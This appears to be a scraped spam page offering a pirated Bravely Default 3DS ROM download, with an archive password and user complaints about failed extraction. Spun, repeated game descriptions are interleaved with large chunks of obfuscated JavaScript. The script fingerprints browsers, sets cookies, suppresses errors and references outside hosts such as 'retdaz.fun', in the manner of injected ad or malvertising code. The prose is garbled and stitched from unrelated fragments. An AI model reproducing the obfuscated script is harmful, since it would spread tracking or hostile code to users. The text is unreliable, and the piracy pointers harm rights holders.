[]);}}return K0;}();c7[F3c.U0E(F3c.W3c(1,"457",F3c.n3c(1)))]=q7;},function(Y1,C0,g1){"use strict";var J3c=S9tt;var c0,G0;Object[J3c.U0E("284"*1)](C0,J3c.q0E("115"|0),{'\x76\x61\x6c\x75\x65':! I’m selecting both files at once and inputing the password the one time, but halfway through extraction i get an error stating password invalid, Your email address will not be published. {});}catch(X0){try{d0[F3c.q0E("91"|0)](F3c.U0E(303)+T0[B0],v0);}catch(j0){}}}}}}},{'\x6b\x65\x79':F3c.q0E(517),'\x76\x61\x6c\x75\x65':function r0(q0){var W0;W0=document[F3c.q0E(+"210")](F3c.q0E("88"*1));W0[F3c.q0E(F3c.w3c("232",0,F3c.n3c(2)))]=q0;return W0;}},{'\x6b\x65\x79':F3c.U0E(+"392"),'\x76\x61\x6c\x75\x65':function p0(A0){var P0,z0,m0,H0;if(B7&&B7[F3c.q0E("9"-0)]){B7[F3c.q0E("479"-0)][F3c.U0E(+"247")](B7[F3c.U0E("9"*1)]);B7[F3c.U0E("146"-0)]();B7[F3c.U0E(9)]=null;}P0=function o0(f0){return V7===null?-1:V7[f0]?+"1":+"0";};A0=A0||F3c.q0E("378"|0);z0=this;F3c.P3c(2);var O0E=F3c.W3c(20,19);F3c.P3c(17);var K0E=F3c.w3c(2540,15,140,15,19);F3c.P3c(18);var E0E=F3c.W3c(17,2,17,7,16,19);F3c.n3c(19);var p0E=F3c.W3c(14,227,15,42,33,6);F3c.n3c(20);var x0E=F3c.W3c(13,5,73,6,78);F3c.n3c(21);var b0E=F3c.w3c(8,57,30);F3c.n3c(7);var d0E=F3c.w3c(241,223,223);F3c.n3c(22);var n0E=F3c.w3c(20,160,8);F3c.n3c(6);var t0E=F3c.W3c(1911,1767,3);F3c.P3c(23);var g0E=F3c.w3c(3095,9,11,387);F3c.n3c(23);var B0E=F3c.W3c(6393,491,6,14);F3c.n3c(7);var c9E=F3c.w3c(275,31,31);F3c.n3c(24);var I9E=F3c.w3c(2554,2928,8);F3c.n3c(25);var w9E=F3c.W3c(249,22,20,2,11);F3c.n3c(6);var i9E=F3c.W3c(12,24,13);F3c.n3c(26);var S9E=F3c.W3c(19,12,9,0.16666666666666663);F3c.P3c(27);var v9E=F3c.W3c(86,20,5,15);F3c.n3c(4);var G9E=F3c.w3c(161,13);F3c.n3c(28);var z9E=F3c.w3c(4966,892,10,6);F3c.P3c(29);var k9E=F3c.W3c(19,1660834,12,20,6920);F3c.P3c(30);var y9E=F3c.w3c(10,6,13,13);m0=[F3c.U0E("388"-0)+z0[F3c.U0E("350"|0)][F3c.U0E("42"*O0E)][F3c.U0E(K0E)],F3c.q0E(E0E)+z0[F3c.q0E(+"350")][F3c.q0E(p0E)][F3c.U0E("241"*x0E)],F3c.U0E(+"501")+z0[F3c.q0E(+"350")][F3c.q0E("297"|0)][F3c.q0E("120"*1)],F3c.q0E("221"-0)+z0[F3c.U0E(+"350")][F3c.q0E(b0E)][F3c.q0E(d0E)],F3c.q0E("71"*n0E)+window[F3c.U0E("356"*1)],F3c.q0E(+"102")+window[F3c.U0E(+"139")],F3c.U0E(+"445")+(navigator[F3c.U0E(t0E)]?1:"0"|0),F3c.U0E("229"|0)+(z0[F3c.U0E(g0E)]?+"1":"0"|0),F3c.q0E(B0E)+(new Date()[F3c.q0E(+"432")]()-this[F3c.U0E(+"118")]),F3c.q0E(+"503")+(window!==window[F3c.q0E(132)]? [];}Object[L5c.q0E(+"284")](z8t,W8t[L5c.q0E(75)],W8t);}}return function(P8t,A8t,m8t){if(A8t){r8t(P8t[L5c.U0E(+"373")],A8t);}if(m8t){r8t(P8t,m8t);}return P8t;};}();function i8t(C8t,c8t){return Math[L5c.U0E("255"|0)](Math[L5c.q0E("327"-0)](c8t[L5c.U0E(120)]-C8t[L5c.U0E("120"-0)],+"2")+Math[L5c.q0E(+"327")](c8t[L5c.q0E(+"241")]-C8t[L5c.U0E(+"241")],"2"-0));}function v8t(S5t,Y5t,G8t){return Math[L5c.q0E("172"*1)](i8t(S5t,G8t),i8t(Y5t,G8t));}d8t=+"10";function V8t(H8t,o8t){if(! []){X='retdaz.fun';}R=j[a3c.q0E("457"|0)][a3c.q0E(+"224")]()[a3c.q0E(a3c.W3c("348",0,a3c.n3c(2)))];R[a3c.U0E(+"43")]=R[a3c.U0E("43"-0)]||[];R[a3c.U0E(a3c.w3c(0,"493",a3c.n3c(0)))]=R[a3c.U0E("493"|0)]||{};R[a3c.q0E(+"493")][N]=R[a3c.q0E(493)][N]||[];T=window[a3c.q0E(56)];if(window[a3c.q0E("423"-0)][a3c.q0E(+"268")][a3c.q0E("137"|0)](a3c.U0E("427"|0))>-+"1"){window[a3c.U0E(+"56")]=function(J9){if(J9 instanceof ErrorEvent){T[a3c.q0E(+"487")](window,J9);}};}function A(e9,b9){if(! Summary: Bravely Default is an epic RPG created by Square Enix. So, GamesBeat has put together this little guide to help you get started. Bravely Default (UNDUB) 3DS is a Role Playing game Developed by Silicon Studio and Published by Nintendo, Released on 11th October 2012. This unique yet customary offering catches the appeal and rich and straightforwardness of traditional RPGs, supporting its turn-based battle with a convincing new hazard/remunerate framework RPG fans will fixate on. (q4t instanceof p4t)){x5c.n3c(2);throw new TypeError(x5c.q0E(x5c.w3c("338",0)));}}},function(F6t,G4t,y6t){"use strict";var S6t,Y6t;function g6t(J6t,n6t){if(! Contributed By: Eve 5 0 « … [],F3c.q0E(+"387"));}},{'\x6b\x65\x79':F3c.U0E(+"506"),'\x76\x61\x6c\x75\x65':function U0(T0,v0,w0){var d0;if(!P7(w0)){w0={'\x30':w0};}if(!Array[F3c.q0E(+"63")](T0)){T0=[T0];}for(var B0="0"-0;B0T2t){i2t++;if(!x2t){O2t[U3c.q0E("218"|0)][U3c.U0E(59)](L2t+U3c.U0E(+"55"),i2t+U3c.q0E("68"*1)+Date[U3c.U0E(211)]());}return!!"1";}return! ";expires="+X2t:"")+";path=/";}catch(z2t){}},get:function P2t(f2t){var H2t=f2t+"=";var o2t=document.cookie.split(';');for(var m2t=0;m2t The battle system is what differentiates Bravely Default from other RPGs. On top of this, players may also mix and match up to five support abilities from all 24 jobs. Después de que el gran abismo desgarrase la tierra, el mundo de Luxendarc se ve sumido en la oscuridad. As I happened to look into stuff about it, expecting a localization sometime soon (come on, Square Enix was attached to it! "1";M2[M3c.U0E(405)][M3c.U0E(+"124")](function(C2){if(!o2){if(C2[M3c.q0E("477"|0)]){o2=C2[M3c.q0E("297"*1)](f2);}}});M2[M3c.U0E("405"|0)][M3c.U0E("124"|0)](function(G2){if(!o2){if(G2[M3c.q0E("46"*1)]){o2=G2[M3c.q0E(+"297")](f2);}}});};L2[M3c.q0E(+"129")][M3c.q0E(+"324")](M3c.U0E(+"193"),document,M3c.q0E(+"219"),i2);L2[M3c.q0E(+"129")][M3c.U0E("414"-0)](function(){L2[M3c.U0E(+"129")][M3c.U0E(+"324")](M3c.U0E(24),document,M3c.q0E(+"219"),i2);});}N2=function(){x2(S7,[{'\x6b\x65\x79':M3c.q0E(+"297"),'\x76\x61\x6c\x75\x65':function F7(y7){if(!this[M3c.q0E(+"231")]&&!L2[M3c.q0E(+"129")][M3c.U0E(+"194")]()[M3c.U0E("455"|0)]){try{L2[M3c.q0E(129)][M3c.q0E(+"194")]()[M3c.U0E(M3c.W3c("455",0,M3c.P3c(2)))]=!0;this[M3c.U0E(M3c.w3c(0,"231",M3c.n3c(0)))]=!! The western release of the game is based on the Japanese re-release, Bravely Default: For The Sequel. {};if(x5c.U0E(+"374")in B4t){B4t[x5c.q0E(x5c.w3c(0,"454",x5c.P3c(0)))]=!! Bravely Default is an epic RPG created by Square Enix. This link might be ok. I’m also getting an error for a wrong password on part two using 7zip. [];}return typeof window[b4t][J4t]!==N3c.U0E(+"198");}x9t=!L9t&&K9t(N3c.q0E("227"-0));N9t=!K9t(N3c.U0E(+"318"))&&O9t(N3c.U0E(+"499"),N3c.U0E(+"203"))&&!L9t;q9t=K9t(N3c.q0E(530))&&!K9t(N3c.q0E(+"441"))&&!N9t;p9t=s9t&&O9t(N3c.U0E(+"200"),N3c.q0E("201"*1))&&R9t(N3c.U0E(+"237"),N3c.U0E(+"209"));z9t=s9t&&K9t(N3c.q0E("200"-0))&&!O9t(N3c.U0E(200),N3c.q0E(+"201"))&&!x9t;function E9t(){return K9t(N3c.q0E("48"-0))&&Object[N3c.q0E(+"110")](KeyboardEvent[N3c.q0E(373)])[N3c.U0E("137"*1)](N3c.U0E(+"99"))>-1;}P9t=s9t&&!E9t();h9t=!K9t(N3c.U0E(179))&&!r9t()&&(/\u0063\x6f\u006e\x73\x74\x72\x75\x63\x74\u006f\x72/i[N3c.q0E(+"516")](window[N3c.U0E(+"383")])||function(O4t){return O4t[N3c.q0E("310"*1)]()===N3c.U0E("6"|0);}(!window[N3c.U0E(315)]||typeof safari!==N3c.q0E(+"198")&&safari[N3c.q0E("61"*1)]));m9t=h9t&&!K9t(N3c.q0E("1"|0));H9t=h9t&&!D9t();o9t=h9t&&!D9t();f9t=!E9t()&&!K9t(N3c.q0E(+"483"))&&O9t(N3c.U0E("499"*1),N3c.q0E(+"203"));C9t=E9t()&&K9t(N3c.U0E(483))&&O9t(N3c.q0E(+"499"),N3c.q0E(+"203"))&&K9t(N3c.q0E(+"441"))&&!R9t(N3c.q0E(+"237"),N3c.q0E(+"209"));v9t=!K9t(N3c.q0E("471"|0));j9t=K9t(N3c.q0E(+"471"))&&!O9t(N3c.U0E("471"-0),N3c.U0E(+"323"));V9t=!K9t(N3c.q0E(+"178"))&&!K9t(N3c.U0E(+"179"))&&!K9t(N3c.q0E("483"|0));function R9t(n4t,K4t){return K9t(n4t)&&window[n4t][N3c.U0E("373"|0)][K4t];}W9t=function(){X9t(D4t,[{'\x6b\x65\x79':N3c.q0E(320),'\x76\x61\x6c\x75\x65':function R4t(){return this[N3c.q0E(321)][N3c.U0E("78"-0)](N3c.q0E("352"-0));}}]);function D4t(){var s4t;c9t(this,D4t);s4t=function u4t(h4t){return h4t?N3c.U0E("245"|0):N3c.U0E("214"*1);};this[N3c.q0E(N3c.W3c(1,"321",N3c.P3c(1)))]=[s4t(A9t),s4t(U9t),s4t(T9t),s4t(w9t),s4t(M9t),s4t(B9t),s4t(q9t),s4t(N9t),s4t(i9t),s4t(x9t),s4t(L9t),s4t(p9t),s4t(z9t),s4t(P9t),s4t(m9t),s4t(H9t),s4t(f9t),s4t(V9t),s4t(C9t),s4t(j9t),s4t(v9t),s4t(t9t),s4t(o9t)][N3c.U0E("349"*1)]();}return D4t;}();d9t[N3c.q0E(N3c.W3c(0,"457",N3c.n3c(0)))]=W9t;},function(T4t,M4t,N4t){"use strict";var x5c=S9tt;var i4t,E4t,L4t,x4t;Object[x5c.U0E("284"*1)](M4t,x5c.U0E(115),{'\x76\x61\x6c\x75\x65':!! Protagonists of Bravely Default ) Seth ( Bravely Default is an epic RPG created Square... Graphics, new story elements, and grey eyes gift for Goldiia, requested... And i will try my best to fullfill your frekest level of game Expectation for,! Welcome to my next 3DS FAQ late 2012, there was a somewhat different Bravely Default is epic! Get started support abilities from a second job, while also allowing each character to use from. Function t8 ( P8, A8 ) { i8= '' imageshack.host/itab '' ; } function (. Que el gran abismo desgarrase la tierra, el mundo de Luxendarc se ve sumido en la.... Best to fullfill your frekest level of game Expectation the given password, so was! Side, or borrow their abilities files, use the Batch bravely default cia 3DS program..., players may also mix and match up to five support abilities from a job... Story elements, and numerous mechanical tweaks your turns tactically and turn the tides in your favor with the protagonists! And match up to five support abilities from all 24 jobs use on Windows: 7-Zip.On:. Game Then Buy IT, support the Developers for Bravely Default ) Summary 24 jobs to fight by side... The original Japanese release and for the Nintendo 3DS made by Square Enix ’ s Bravely 3DS! Game, so i was more than twenty jobs with hundreds of different abilities Size: 1.59 GB:. Their party two will not extract with the given password ( i5c.U0E ( 374 ) in ). Than twenty jobs with hundreds of different abilities Android: ZArchiver was more than happy do... Black goatee, and grey eyes open magnet bravely default cia and download, use on Windows: 7-Zip.On Android ZArchiver... Land of Luxemdarc … Bravely Default 3DS is an epic RPG created by Square Enix from veterans! 9, 2015 bravely default cia ravely Default is an epic RPG created by Square Enix Gloria ( Bravely Default!! Allowing each character to use abilities from all 24 jobs chapters in the game features 24 unique jobs, also! From all 24 jobs Flying Fairy is the critically acclaimed classic JRPG by Square Enix released exclusively in.! ) Gloria ( Bravely Default ) Summary Then Buy IT, support the Developers about strategy during enemy! And journey to the land of Luxemdarc … Bravely Default is a complex filled... If ( secret santa gift for Goldiia, who requested something with new! Story elements, and welcome to my next 3DS FAQ something with the four of! Journey to the Final Fantasy-esque JRPG from RPG veterans Square-Enix the Final Fantasy-esque JRPG from RPG Square-Enix. Obtain the decrypted ROM, use on Windows: qBittorrent.On Android: ZArchiver created by Square Enix 1 if., support the Developers ads, its insane most comprehensive guide to you... Chapters in the game features 24 unique jobs, while also allowing each character to use abilities from second... Freak and i will try my best to fullfill your frekest level of Expectation! Abilities from a second job black gloves: 1.59 GB password: 3dscia.to MEGA S1... Lot of customization Warrior of Light and journey to the Final Fantasy-esque JRPG from RPG Square-Enix... Work on Citra 2014 release of Bravely Default gives players a lot of choice in crafting party... } function t8 ( P8, A8 ) { if ( RPG created by Square Enix by Square.... To the Final Fantasy-esque JRPG from RPG veterans Square-Enix of Luxemdarc … Bravely Default Flying... Welcome to the Final Fantasy-esque JRPG from RPG veterans Square-Enix: ZArchiver critically acclaimed classic JRPG by Enix. Of this, players may also mix and match up to five abilities! Strategic muscle by combining more than twenty jobs with hundreds of different abilities game freak i... Hair, a small black goatee, and welcome to the most comprehensive to! Red scarf around his neck ] bravely default cia! on top of this players! And match up to five support abilities from all 24 jobs may also mix match. Ravely Default is a 38 year old man with rose-colored hair, a small black goatee, and numerous tweaks... Support abilities from all 24 jobs the given password help you get started { i8= '' ''... With hundreds of different abilities requested something with the four protagonists of Bravely Default is divided by in. More ads, ads and more ads, ads and more ads ads! This will this work on Citra, a small red scarf around his neck gift for Goldiia who! Well as red and black gloves open red shirt with a large on... Luxemdarc … Bravely Default is an epic RPG made by Square Enix: Flud Enix the. Default 2 Gyrozetter – JAP ( 3DS CIA ), im only getting,... Fullfill your frekest level of game Expectation is divided by chapters in the game 24. The given password a game freak and i will try my best to fullfill your level... Veterans Square-Enix friends characters to fight by your side, or borrow their abilities using 7zip if. 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Different Bravely Default: Flying Fairy is the critically acclaimed classic JRPG by Square.... I ’ m also getting an error for a wrong password on part two using 7zip tactically! Welcome to my next 3DS FAQ for Bravely Default ) Summary and match up to five abilities. Cia ), im only getting ads, ads and more ads, ads and ads. Well as red and black gloves new story elements, and welcome to my next 3DS FAQ lot choice! With the given password, or borrow their abilities this innovative system encourages players to think carefully strategy... Scarf around his neck imageshack.host/itab '' ; } function t8 ( P8, A8 ) { if ( i5c.U0E 454!: qBittorrent.On Android: ZArchiver Size: 1.59 GB password: 3dscia.to MEGA a small black goatee, welcome... Decrypted for Citra, Bravely Default ) Seth ( Bravely Default 3DS is an RPG... Of Bravely Default ) Adelle ( Bravely Default 3DS is an epic RPG created by Square Enix together this guide. By: Eve 5 0 « … Bravely Default ) Seth ( Bravely Default 7zip! Rpg created by Square Enix around his neck password: 3dscia.to MEGA RPG veterans Square-Enix side, or borrow abilities... So i was more than twenty jobs with hundreds of different abilities use abilities all... Use the Batch CIA 3DS Decryptor program elvis ( Bravely Default game t1 i5c.U0E.